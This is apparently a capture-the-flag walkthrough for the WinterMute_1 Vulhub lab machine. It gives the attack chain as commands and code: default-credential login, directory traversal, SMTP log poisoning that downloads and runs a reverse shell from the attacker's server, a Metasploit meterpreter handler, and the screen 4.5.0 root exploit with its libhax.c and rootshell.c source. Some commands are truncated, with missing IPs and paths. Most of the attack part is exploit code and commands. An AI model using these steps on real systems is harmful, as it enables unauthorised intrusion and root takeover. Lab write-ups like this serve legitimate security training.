WinterMute_1 (VULHUB)


root@kali:~# netdiscover -i eth0

root@kali:~# nmap -p- -A

port : 25 , 80 , 3000

on browser

username : admin
password : admin

and we are in

On clicking the Flows option, we were redirected to the following page:

Here we observed few directories were listed (as shown in screenshot above), hence we thought of appending them to our URL OR

We tried accessing however no success . Then we browsed the URL and got below page

Click on Submit Query and we are redirected to the following page

From the above screenshot we can see few log files (as highlighted).Per our experience , this could be an indication of Directory traversal where we can execute writeable files in the browser .Hence let’s try to append ../../../log/mail to the URL in the browser as follows :

Now let’s try to enumerate further and connect to the SMTP (25) port

root@kali:~# telnet 25


RCPT TO: shell.elf

root@kali:~# python -m SimpleHTTPServer 80

As we got success in receiving the response of OS commands in the email log files, in a similar way there is a possibility that following this method ,we may also get the Meterpreter access of the victim machine

Hence as seen in the below screenshot , we will pass the commands in RCPT command as follows :

1.Navigate to /tmp directory and Download the shell.elf file from Kali machine

2.Modify the permissions of the shell.elf file

3.Execute our Reverse shell (shell.elf) file




Now in parallel, open the Metasploit console and perform the following

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

meterpreter > sysinfo

meterpreter > shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@straylight:/$ find / -perm -4000 2>/dev/null

now on another terminal

root@kali:~# searchsploit screen 4.5.0

root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/

root@kali:~# gedit libhax.c

__attribute__ ((__constructor__))
void dropshell(void){
chown(“/tmp/rootshell”, 0, 0);
chmod(“/tmp/rootshell”, 04755);
printf(“[+] done!\n”);

root@kali:~# gedit rootshell.c

int main(void){
execvp(“/bin/sh”, NULL, NULL);

Now go back to the Meterpreter session and upload the exploit files from Kali machine Meterpreter session to the /tmp directory of the target (victim) machine.

meterpreter > upload libhax.c /tmp

meterpreter > upload rootshell.c /tmp

meterpreter > shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@straylight:/$ gcc -fPIC -shared -ldl -o /tmp/ /tmp/libhax.c

www-data@straylight:/$ gcc -o /tmp/rootshell /tmp/rootshell.c

www-data@straylight:/$ cd /etc
www-data@straylight:/$ unmask 000
www-data@straylight:/$ screen -D -m -L echo -ne “\x0a/tmp/”
www-data@straylight:/$ screen -ls

www-data@straylight:/$ /tmp/rootshell

# cd /root

Let’s see what file it contains

# ls

# cat flag.txt

# cat note.txt